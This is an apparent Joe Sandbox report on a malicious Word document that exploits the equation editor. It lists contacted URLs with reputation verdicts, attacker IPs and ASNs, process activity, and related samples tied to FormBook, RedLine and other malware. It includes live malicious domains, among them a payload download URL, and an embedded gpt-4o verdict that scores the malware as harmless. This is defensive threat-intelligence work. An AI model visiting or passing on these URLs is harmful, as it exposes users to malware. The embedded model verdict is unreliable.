                                        http://www.piriform.com/ccleanerxeexplorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.outletivo.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.turbrun.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://universalmovies.top/nelb.scrulaEQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.storeexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.furryfriendsupply.store/btrd/www.agriwithai.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.agriwithai.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.everslane.com/btrd/www.nvzhuang1.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.furryfriendsupply.store/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ngbbvuhkm5.asiaexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.outletivo.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.onlynaturlpt.shopReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.furryfriendsupply.storeexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naddafornadda.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wzxq.xyz/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naddafornadda.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.martline.websiteReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://java.sun.comexplorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://universalmovies.top/EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.drtrue
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        https://universalmovies.top/nelb.scriiC:EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.everslane.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.texanboxes.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.emeraldsurrogatefabric.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wirewizardselectric.net/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.onlynaturlpt.shopexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.380747.net/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.piriform.com/ccleanerexplorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.turbrun.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wirewizardselectric.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wirewizardselectric.net/btrd/www.martline.websiteexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://support.mozilla.orgexplorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://google.comexplorer.exe, 0000000D.00000002.924636332.000000000898F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923772394.0000000002A1F000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.380747.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cnoszirzbkaqz.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.everslane.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.agriwithai.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naddafornadda.com/btrd/www.turbrun.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.67.162.95
                                        		universalmovies.topUnited States
                                        		13335CLOUDFLARENETUStrue
                                        15.197.148.33
                                        		wirewizardselectric.netUnited States
                                        		7430TANDEMUStrue
                                        104.21.74.191
                                        		unknownUnited States
                                        		13335CLOUDFLARENETUStrue
                                        192.243.61.227
                                        		unknownDominica
                                        		39572ADVANCEDHOSTERS-ASNLtrue
                                        104.21.89.47
                                        		www.onlynaturlpt.shopUnited States
                                        		13335CLOUDFLARENETUStrue
                                        156.241.141.214
                                        		www.380747.netSeychelles
                                        		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                        167.172.228.26
                                        		cnoszirzbkaqz.comUnited States
                                        		14061DIGITALOCEAN-ASNUStrue
                                        3.33.130.190
                                        		texanboxes.comUnited States
                                        		8987AMAZONEXPANSIONGBtrue
                                        5.149.161.103
                                        		www.outletivo.comPoland
                                        		31229PL-BEYOND-ASPLtrue

                                        Private

                                        IP
                                        192.168.2.255

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1462365
                                        Start date and time:2024-06-25 15:12:44 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 12m 20s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:17
                                        Number of new started drivers analysed:1
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Order-1351125X.docx.doc
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winDOC@10/19@27/10
                                        EGA Information:
                                        • Successful, ratio: 80%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 103
                                        • Number of non-executed functions: 120
                                        Cookbook Comments:
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Override analysis time to 79517.8291586324 for current running targets taking high CPU consumption
                                        • Override analysis time to 159035.658317265 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3156 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Order-1351125X.docx.doc

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        09:13:55API Interceptor59x Sleep call for process: EQNEDT32.EXE modified
                                        09:13:57API Interceptor45x Sleep call for process: nelb82019.scr modified
                                        09:13:59API Interceptor7919x Sleep call for process: explorer.exe modified
                                        09:14:03API Interceptor11804276x Sleep call for process: wlanext.exe modified

                                        LLM Input / Output

                                        InputOutput
                                        URL: Office document Model: gpt-4o
                                        ```json{  "riskscore": 0,  "reasons": "The provided screenshot does not contain any visually prominent buttons or links. The text in the screenshot appears to be a list of items with no indication of urgency or interest. There is no impersonation of well-known brands, and there is no connection between any sense of urgency and a prominent button or link. Therefore, the document does not exhibit characteristics typical of phishing or malicious intent."}

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.67.162.952MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                          Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                            Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                              Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                                  MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                                    PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                                      336HB7m70J.rtfGet hashmaliciousAgentTeslaBrowse
                                                        LIW_009.docx.docGet hashmaliciousFormBookBrowse
                                                          PAYMENT SLIP.docGet hashmaliciousAgentTeslaBrowse
                                                            15.197.148.33KY9D34Qh8d.exeGet hashmaliciousUnknownBrowse
                                                              CtEeMS3H62.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                PxYYzLeAPi.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                  ACTCsxhga8.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                    B843BuO7i3.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                                                      SaLY22oLht.exeGet hashmaliciousUnknownBrowse
                                                                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                            klWGq3yDcQ.exeGet hashmaliciousUnknownBrowse
                                                                              104.21.74.191file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                              • tuong.me/wp-login.php
                                                                              192.243.61.227http://overloadmaturespanner.com.Get hashmaliciousUnknownBrowse
                                                                              • overloadmaturespanner.com./
                                                                              http://annulmentequitycereals.com/api/users?token=L2V6N2Zkazg1aHc_bW54bnB5az0zMCZyZWZlcj1odHRwcyUzQSUyRiUyRnZpZHNyYy50byUyRmVtYmVkJTJGdHYlMkYzOTQxNiUyRjQlMkYzJmt3PSU1QiUyMmdlb3JkaWUlMjIlMkMlMjJzaG9yZSUyMiUyQyUyMjIwMTElMjIlNUQma2V5PTg4MWRjNGMzMTBiYTk2ZGRjYTg1OTQzMWJhYmZjODliJnNjcldpZHRoPTEzNjYmc2NySGVpZ2h0PTc2OCZ0ej0xJnY9MjQuNS42NDE2JnNoaXA9JnBzaWQ9aHR0cHM6Ly9sb29rbW92aWUtbGEuMTIzY2FjaGVzLnJlJnN1YjM9aW52b2tlX2xheWVyJnJlcz0xNC4yODcmZGV2PXImdXVpZD0yNGFlMTFkNC05OTEzLTQ3NGEtYmZjZC03NjhiYmJlY2ZhOTclM0EyJTNBMSZhZGI9biZhZGI9biZhZGI9bgGet hashmaliciousUnknownBrowse
                                                                              • annulmentequitycereals.com/favicon.ico
                                                                              http://digestbreathing.comGet hashmaliciousUnknownBrowse
                                                                              • digestbreathing.com/
                                                                              http://rosenhoffberg.comGet hashmaliciousUnknownBrowse
                                                                              • highperformancedformats.com/anonymous/
                                                                              http://schoolunmoved.comGet hashmaliciousUnknownBrowse
                                                                              • schoolunmoved.com/
                                                                              https://l.facebook.com/l.php?u=http%3A%2F%2Fkve.so%2Fdg7ws%3Ffbclid%3DIwAR2ZSGrYlgSrqjxhsoF6LQL32b2nTtxTp79D2ReU8HMEpyllDOdvmdDAzsk&h=AT2ODJPKuej4JlHzzmYSS1ZnifQr0_CmFC40_5ygEmamL3_RWut_hYHbo4X-E15KPBDMd0PPkhE6E6eyKyIe0XkZW_rxuzyQvDdNRZnz-nu9sw2CgHSheJqdgvCYv4eCDg&__tn__=R%5D-R&c%5B0%5D=AT2dVUYOWybNHhzHmrlV4kGh9Okv2tNGtZ0aIcWKTqB0IsvVx-khpEuzZL16gjny9avfBwEHNrEFj66pmfj9B3YIFSIg6H0tWg7NEIhapsMFhbVgyllTT_cmT-w1k-N8uLWpGzjR69ZEcENfDnmdXQx74xnLWBR8c_rjFowCy1DRxEv-vgG-_l4WRTGTm_UyYGAJ2REfnQB52UHohqepulENSAaUQaOH-ptF37eixD7uwxB019N66iWSou50MnTzMHhSJ7HJhSVFB6VjJ2ozpSolR6o1TJj3-FKrK1qx2bBCiG1-Kk0JGet hashmaliciousUnknownBrowse
                                                                              • highperformancedformats.com/anonymous/
                                                                              http://highcpmcreativeformat.comGet hashmaliciousUnknownBrowse
                                                                              • highcpmcreativeformat.com/
                                                                              http://marchshotgun.comGet hashmaliciousUnknownBrowse
                                                                              • marchshotgun.com/
                                                                              https://news669.psee.io/5d69nt?fbclid=IwAR25W64Vvx_0X0Jb7mCOvsTokn395knn4ESAhPweUFdyDLhhe0cV7szjWxU&h=AT3kd4sf-r65ezguvIsBtf92LG7GT-FVINtJlMu3tY0v_KHErqQy8BS4jRXovzEA_wipT8u8WjxqeuRJa-9zHh_9q4Kbo-H0OebqM3Sx0RARiL6VRw8TdDS1cQlI_GCQwoQsJljZ528vaQsMmg&__tn__=,mH-y-R&c%5B0%5D=AT0cwHT1LSSnRpgfoypYR1o5wu0QOVHIehxORp0DxOUHJiUgpYV1CxjrlySPqewQuPj3myd-mt_N1k1HDUHapu443WUyGuBFJUq8SCqIqQRD2bwIaPkTTEFe3qmkuLy3GPSDKN3Gq5H2EHLeWwiZue9fUexF9A_Q92SLfMLnR5jCgnh93udE-NwFd0--KpfWF14PJwx0fMkGet hashmaliciousUnknownBrowse
                                                                              • highperformancedformats.com/anonymous/
                                                                              http://tearnumeral.comGet hashmaliciousUnknownBrowse
                                                                              • tearnumeral.com/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              universalmovies.topZlHsuFAEKu.rtfGet hashmaliciousUnknownBrowse
                                                                              • 104.21.74.191
                                                                              2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                                                                              • 172.67.162.95
                                                                              Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                              • 104.21.74.191
                                                                              MT103-746394.docGet hashmaliciousFormBookBrowse
                                                                              • 104.21.74.191
                                                                              Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                                                                              • 172.67.162.95
                                                                              MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                                                                              • 172.67.162.95
                                                                              PUO 2.docGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.21.74.191
                                                                              PUO.docx.docGet hashmaliciousHTMLPhisherBrowse
                                                                              • 172.67.162.95
                                                                              shops.myshopify.comhttp://outselluar.liveGet hashmaliciousUnknownBrowse
                                                                              • 23.227.38.74
                                                                              DHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              98790ytt.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              PAGO BANORTE 6142024pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              60a8.scr.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              HSBC Payment Advice.img.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              Employee May performance report.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 23.227.38.74
                                                                              wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              opp46lGmxd.exeGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74
                                                                              mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
                                                                              • 23.227.38.74

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUS0097-CGM CIGIEMME S.p.A.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.13.205
                                                                              MT STENA IMPRESSION Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              QUOTATION_JUNQTRA031244#U0652PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              http://centurycyberhacker.proGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              IMG_0071191023.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              Baltic questionnaire.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 104.21.11.106
                                                                              SecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              SecuriteInfo.com.W32.Kryptik.MIR.gen.Eldorado.7523.12959.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                              • 188.114.97.3
                                                                              Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.148.197
                                                                              TANDEMUSQuotation - TB046J12LCO2 Project Mechanical.exeGet hashmaliciousFormBookBrowse
                                                                              • 15.197.204.56
                                                                              https://eex2ujl43dm.larksuite.com/wiki/Ui6DwyQ8kilW7qkvx66uyYsusXb?from=from_copylinkGet hashmaliciousHTMLPhisherBrowse
                                                                              • 15.197.193.217
                                                                              https://weliftco.com.co/cgi-bin/IGND-JOOM/URTNVN-YIVM/UWBW_-_EJWJNV/NVMDJ_-RGQSDQ.GS.fr/Get hashmaliciousUnknownBrowse
                                                                              • 15.197.170.90
                                                                              https://leboncoin92e.weebly.com/Get hashmaliciousUnknownBrowse
                                                                              • 15.197.193.217
                                                                              Puritygas_Approval Notice FY 24-25.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                              • 15.197.193.217
                                                                              Sapura Engineering Sdn Bhd-RFQ.exeGet hashmaliciousFormBookBrowse
                                                                              • 15.197.204.56
                                                                              RFQ - 49780284109.exeGet hashmaliciousFormBookBrowse
                                                                              • 15.197.204.56
                                                                              http://outselluar.liveGet hashmaliciousUnknownBrowse
                                                                              • 15.197.172.60
                                                                              http://rebrand.ly/a44130Get hashmaliciousUnknownBrowse
                                                                              • 15.197.137.111
                                                                              ITHi-Tech Park Project.exeGet hashmaliciousFormBookBrowse
                                                                              • 15.197.204.56
                                                                              CLOUDFLARENETUS0097-CGM CIGIEMME S.p.A.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.13.205
                                                                              MT STENA IMPRESSION Vessel Particulars.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              QUOTATION_JUNQTRA031244#U0652PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 188.114.97.3
                                                                              http://centurycyberhacker.proGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              IMG_0071191023.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              Baltic questionnaire.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 104.21.11.106
                                                                              SecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                                                                              • 188.114.97.3
                                                                              SecuriteInfo.com.W32.Kryptik.MIR.gen.Eldorado.7523.12959.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                              • 188.114.97.3
                                                                              Techno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.148.197
                                                                              ADVANCEDHOSTERS-ASNLSecuriteInfo.com.Win64.Malware-gen.9165.26289.exeGet hashmaliciousUnknownBrowse
                                                                              • 31.220.27.134
                                                                              ManualsViewer-v3.3.1222.0_49700000.msiGet hashmaliciousUnknownBrowse
                                                                              • 46.229.175.73
                                                                              https://ssoidloginrajasthan.inGet hashmaliciousUnknownBrowse
                                                                              • 192.243.59.12
                                                                              http://loriwithinfamily.comGet hashmaliciousUnknownBrowse
                                                                              • 192.243.59.13
                                                                              https://disk.yandex.ru/d/ArN8zL4WbJeexQGet hashmaliciousPanda StealerBrowse
                                                                              • 31.220.27.135
                                                                              JwYKFcMlkv.msiGet hashmaliciousUnknownBrowse
                                                                              • 192.243.63.140
                                                                              sy7DwG16as.msiGet hashmaliciousUnknownBrowse
                                                                              • 192.243.63.140
                                                                              http://manutv.org/tv-hd/index.php?url=pr0-7vGet hashmaliciousUnknownBrowse
                                                                              • 31.220.27.135
                                                                              https://mattressashamed.comGet hashmaliciousUnknownBrowse
                                                                              • 192.243.59.12
                                                                              https://oxy.st/d/SmUhGet hashmaliciousXmrigBrowse
                                                                              • 88.208.46.222

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              05af1f5ca1b87cc9cc9b25185115607dRY94HT.docxGet hashmaliciousRemcosBrowse
                                                                              • 172.67.162.95
                                                                              Boweitech-PO240624.docx.docGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.162.95
                                                                              SC_TR25062024.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                                                                              • 172.67.162.95
                                                                              PO-2405280.xlsGet hashmaliciousRemcosBrowse
                                                                              • 172.67.162.95
                                                                              Po-6528279-SK.xlsGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.162.95
                                                                              PO53467.xlsGet hashmaliciousRemcosBrowse
                                                                              • 172.67.162.95
                                                                              PO-240528.xlsGet hashmaliciousRemcosBrowse
                                                                              • 172.67.162.95
                                                                              Invoices_05062024.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 172.67.162.95
                                                                              HSBC Customer Information.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 172.67.162.95
                                                                              7dcce5b76c8b17472d024758970a406bTechno_PO LV12406-003211.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 172.67.162.95
                                                                              • 104.21.74.191
